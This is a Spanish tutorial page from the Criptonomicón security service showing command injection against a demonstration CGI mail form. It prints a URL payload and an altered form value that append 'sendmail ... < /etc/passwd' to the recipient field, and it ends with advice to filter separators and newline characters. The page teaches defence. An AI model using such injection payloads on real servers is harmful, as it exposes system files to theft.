Vulnerabilidad en CGI

Imagínate que quiero enviar un correo a alguna de las siguientes personas:

Si en vez de apretar el botón de Enviar, examino el código HTML para ver lo que hace el formulario, veo que podría engañar al CGI escribiendo:

http://www.iec.csic.es/cgi-bin/vulnerable.exe?destinatario = gonzalo@iec.csic.es; sendmail -t gonzalo@pampaneira.iec.csic.es < /etc/passwd;

Puedes hacer la prueba, poniendo tu dirección de correo o mandando ejecutar cualquier otro comando del shell.

Nota: Si no funciona, prueba a sustituir los espacios por '%20'.

Otra posibilidad que tienes es guardar esta página en tu disco duro local. A continuación, edítala y en la línea siguiente:

<input type = radio name = "destinatario" value = "gonzalo@iec.csic.es" checked>Gonzalo Álvarez<br>

sustituyes el contenido de value por lo siguiente:

gonzalo@iec.csic.es; sendmail -t gonzalo@pampaneira.iec.csic.es < /etc/passwd;

Guardas el archivo y lo cargas en tu navegador. Ahora cuando pulses el botón de "Enviar correo", se producirá el mismo efecto que antes.

Nota: Si no funciona, prueba a sustituir los espacios por '%20', al igual que antes.

En vez de punto y coma, ";", se pueden separar los comandos por retornos de carro, que de hecho es la forma más natural. En el caso de HTTP, en la cadena de URL los retornos de carro se codifican como "%0a". Por lo tanto, es importante no olvidarse de filtrar en la entrada también los carateres de retorno de carro y alimentación de línea, "\n" y "\r", ya que en caso contrario, si nos olvidamos de ellos, podría ocurrir que utilizando el retorno de carro un atacante consiga encadenar varios comandos de entrada al CGI, con posibles efectos desastrosos.

Criptonomicón es un servicio ofrecido libremente desde el Instituto de Física Aplicada del CSIC. Para información sobre privacidad, por favor consulte la declaración de política sobre privacidad.